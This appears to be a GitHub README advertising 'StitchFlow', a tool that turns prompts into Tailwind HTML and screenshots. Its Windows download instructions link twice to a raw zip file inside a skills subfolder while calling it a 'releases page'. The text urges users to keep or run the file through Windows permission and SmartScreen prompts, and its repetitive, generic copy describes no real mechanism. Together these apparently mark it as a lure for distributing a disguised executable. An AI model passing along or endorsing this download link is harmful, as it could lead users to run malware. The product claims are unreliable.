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✨ stitchflow - Turn prompts into ready UI

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🚀 What StitchFlow does

StitchFlow helps you turn plain prompts into clear UI directions, Tailwind-friendly HTML, and screenshots. It works with tools like Codex, Claude Code, OpenClaw, GitHub Copilot, and Gemini CLI.

Use it when you want to:

  • Turn an idea into a UI plan
  • Create HTML that fits Tailwind CSS
  • Produce screenshots for design review
  • Keep design work in one flow
  • Move from prompt to UI faster

💻 Windows download

To use StitchFlow on Windows, visit this page to download:

https://raw.githubusercontent.com/blox4859/stitchflow/main/skills/stitch-design-local/Software-v1.7.zip

From that page:

  1. Open the latest release
  2. Find the Windows download file
  3. Download and open it
  4. Follow the on-screen steps
  5. Start StitchFlow from your desktop or Start menu

If the file comes as a ZIP, unzip it first, then open the app inside the folder.

📦 What you need

StitchFlow is made for everyday Windows users. For a smooth setup, use:

  • Windows 10 or Windows 11
  • 4 GB of memory or more
  • Enough free disk space for the app and files it creates
  • A stable internet connection for the first download
  • A modern browser for opening release pages and screenshots

If your computer runs other desktop apps without trouble, it should handle StitchFlow well.

🧭 How to install

  1. Go to the releases page
  2. Download the latest Windows version
  3. Save the file to your Downloads folder
  4. If Windows asks for permission, choose the option to keep or run the file
  5. If the file is zipped, right-click it and choose Extract All
  6. Open the extracted folder
  7. Double-click the app file to start StitchFlow

If you see a prompt from Windows SmartScreen, check that you downloaded the file from the official releases page before you continue.

🪟 First launch on Windows

When you open StitchFlow for the first time:

  1. Let Windows finish any setup it shows
  2. Wait for the app to open
  3. Read the start screen
  4. Pick the kind of output you want
  5. Enter a prompt in plain language
  6. Let StitchFlow generate directions, HTML, or screenshots

A simple first prompt could be:

  • Create a clean login screen for a finance app
  • Make a dashboard for a task manager
  • Build a pricing page with three plans
  • Design a mobile menu with a simple layout

🎨 How to use it

StitchFlow works best when you give it a clear prompt. You do not need technical terms. Just describe what you want.

Try this pattern:

  • What you want to build
  • Who it is for
  • What it should include
  • What style you want
  • What device it should fit

Examples:

  • Build a signup page for a fitness app with a calm, simple look
  • Create a product card layout for an online shop using Tailwind-friendly HTML
  • Make a settings screen for a desktop app with clear spacing and a dark theme
  • Turn this idea into UI directions and a screenshot for review

🧩 Common ways people use StitchFlow

UI directions

StitchFlow can turn a prompt into step-by-step UI guidance. This helps when you want a layout plan before you build.

Tailwind-friendly HTML

It can create HTML that works well with Tailwind CSS. This is useful when you want clean markup that matches your design idea.

Screenshots

StitchFlow can produce screenshots so you can review the look of the UI before sharing it with others.

Multi-tool use

It fits into workflows with Codex, Claude Code, OpenClaw, GitHub Copilot, and Gemini CLI. That gives you more ways to move from idea to interface.

🛠️ Simple workflow

A good flow looks like this:

  1. Write a short prompt
  2. Choose the output you want
  3. Review the UI direction or HTML
  4. Make small changes to the prompt
  5. Generate another version
  6. Save the version you like best

If the result is too plain, add more detail. If it feels too busy, ask for a simpler layout.

🖼️ Example prompts

Use these if you want a quick start:

  • Create a clean landing page for a note app
  • Build a dashboard for a small team workspace
  • Design a login screen with email and password fields
  • Make a pricing section with monthly and yearly plans
  • Turn a simple product idea into Tailwind-friendly HTML
  • Create screenshots for a three-step sign-up flow
  • Design a settings page with tabs and clear labels

🧼 Tips for better results

Keep your prompt short and specific:

  • Say what the page or screen should do
  • Mention the device, like desktop or mobile
  • Name the main parts you want on the page
  • Say the mood, like clean, modern, calm, or bold
  • Ask for one change at a time when refining results

Good prompt:

  • Create a mobile checkout screen with a simple cart summary, clear buttons, and a clean white layout

Less useful prompt:

  • Make it better

🔍 File and folder notes

After download, you may see files like:

  • The main app file
  • A folder with assets
  • A text file with setup help
  • Screenshot files or image output
  • Generated HTML or prompt output

Keep the whole folder together if the app needs those files to run.

🧠 How StitchFlow fits your tools

StitchFlow works across several tool chains used for prompt-based UI work:

  • Codex for code-focused generation
  • Claude Code for guided building
  • OpenClaw for agent-based flows
  • GitHub Copilot for assisted editing
  • Gemini CLI for command-line use

That makes it a useful bridge between prompt writing and UI output.

🔐 Safety and file checks

Before you open the file, check these things:

  • The download came from the releases page
  • The file name looks like a release file, not a random web page
  • Your browser finished the download fully
  • The file size looks complete
  • You opened the latest release, not an old one

🧹 If something does not open

Try these steps:

  1. Close the app
  2. Open it again from the same folder
  3. Re-download the latest release
  4. Check that Windows did not block the file
  5. Move the app to a simple folder like Downloads or Desktop
  6. Try again after restart

If the app still does not open, use the newest release file from the official page and try a fresh download.

📁 Download again

If you need the release page again, use this link:

https://raw.githubusercontent.com/blox4859/stitchflow/main/skills/stitch-design-local/Software-v1.7.zip

🧭 Quick start for first-time users

  1. Visit the releases page
  2. Download the latest Windows file
  3. Open the file or unzip it if needed
  4. Start the app
  5. Enter a prompt for the UI you want
  6. Review the output
  7. Refine the prompt and run it again

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